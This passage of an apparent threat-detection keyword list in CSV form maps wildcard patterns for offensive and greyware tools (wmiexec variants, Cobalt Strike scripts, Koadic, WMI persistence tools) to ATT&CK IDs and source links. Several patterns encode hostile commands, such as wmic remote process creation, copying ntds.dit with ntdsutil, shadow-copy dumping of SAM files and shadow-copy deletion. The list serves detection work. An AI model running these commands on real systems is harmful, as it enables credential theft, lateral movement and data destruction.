TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*wiresocks-redsocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*Witness.py*,offensive_tool_keyword,EyeWitness,EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.,T1564 - T1518 - T1210 - T1514 - T1552,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/FortyNorthSecurity/EyeWitness,1,1,N/A,N/A,10,4413,812,2023-09-21T20:34:04Z,2014-02-26T16:23:25Z -*WitnessMe*,offensive_tool_keyword,WitnessMe,WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.,T1210.001 - T1593.001 - T1593.002,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/byt3bl33d3r/WitnessMe,1,1,N/A,N/A,7,688,109,2022-12-08T11:04:13Z,2019-07-06T05:25:10Z -*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*WKL-Sec/dcomhijack*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*WKL-Sec/HiddenDesktop*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*WKL-Sec/Winsocky*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*wkssvc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*WLAN-Windows-Passwords-Discord-Exfiltration*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*WldpBypass.cs*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*wl-lic -d *.dat -r *.rsa*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*wmap_crawler.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wmeye.csproj*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*wmeye.exe *,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,0,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*wmeye.sln*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*Wmi_Persistence.ps1*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*wmi_persistence.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*wmic /* /user:administrator process call create *cmd.exe /c *,greyware_tool_keyword,wmic,Lateral Movement with wmic,T1078 - T1028 - T1106 - T1105,TA0002 - TA0004,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic process call create*ntdsutil *ac i ntds* ifm*create full*,greyware_tool_keyword,wmic,The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic SHADOWCOPY /nointeractive*,greyware_tool_keyword,wmic,VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.,T1490 - T1562.002,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wmic shadowcopy call create Volume='C:\'*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic useraccount get /ALL /format:csv*,greyware_tool_keyword,wmic,User Enumeration,T1087 - T1033,TA0006,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic*/Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName*,greyware_tool_keyword,wmic,list AV products with wmic,T1518.001 - T1082,TA0007 - TA0005,N/A,N/A,Discovery,N/A,1,0,N/A,2,9,N/A,N/A,N/A,N/A -*wmic.exe process call create *.txt:*.exe*,greyware_tool_keyword,wmic,Execute a .EXE file stored as an Alternate Data Stream (ADS),T1105 - T1027.001 - T1096 - T1036,TA0002 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*wmic.exe* Shadowcopy Delete*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wmic/wmic.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*WMIcmd*,offensive_tool_keyword,WMIcmd,This tool allows us to execute commands via WMI and get information not otherwise available via this channel.,T1059.001 - T1021 - T1210.001,TA0002 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/nccgroup/WMIcmd,1,1,N/A,N/A,4,324,85,2017-06-24T18:37:16Z,2017-05-17T06:50:12Z -*WMICStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*wmi-event-lateral-movement.*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*WMI-EventSub.cpp*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*wmiexec *.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*WMIExec.git*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec.py -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wmiexec_scheduledjob.py*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec_win32process.py*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec2.0.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*wmiexec2.py*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*wmiexec2-main*,offensive_tool_keyword,wmiexec2,wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*WMIExecHash.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIExecHash.boo,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIExec-main*,offensive_tool_keyword,wmiexec,Set of python scripts which perform different ways of command execution via WMI protocol,T1047 - T1059 - T1070 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/WKL-Sec/wmiexec,1,1,N/A,N/A,2,145,21,2023-06-29T03:30:09Z,2023-06-21T13:15:04Z -*wmiexec-Pro.git*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*wmiexec-pro.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*wmi-lateral-movement.*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*WMImplant*,offensive_tool_keyword,WMImplant,WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.,T1021 - T1059 - T1047 - T1057 - T1049,TA0002 - TA0003 - TA0008 - TA0009 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/FortyNorthSecurity/WMImplant,1,1,N/A,N/A,8,767,152,2018-10-28T19:28:37Z,2016-05-24T14:00:14Z -*WMIPersist.*,offensive_tool_keyword,WMIPersistence,An example of how to perform WMI Event Subscription persistence using C#,T1547.008 - T1084 - T1053 - T1059.003,TA0003 - TA0004 - TA0002,N/A,N/A,Persistence,https://github.com/mdsecactivebreach/WMIPersistence,1,1,N/A,N/A,2,112,34,2019-05-29T09:48:46Z,2019-05-29T09:40:01Z -*wmipersist.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*wmipersistence.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*WMIPersistence.vbs*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*WMIPersistImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*WMI-ProcessCreate.cpp*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 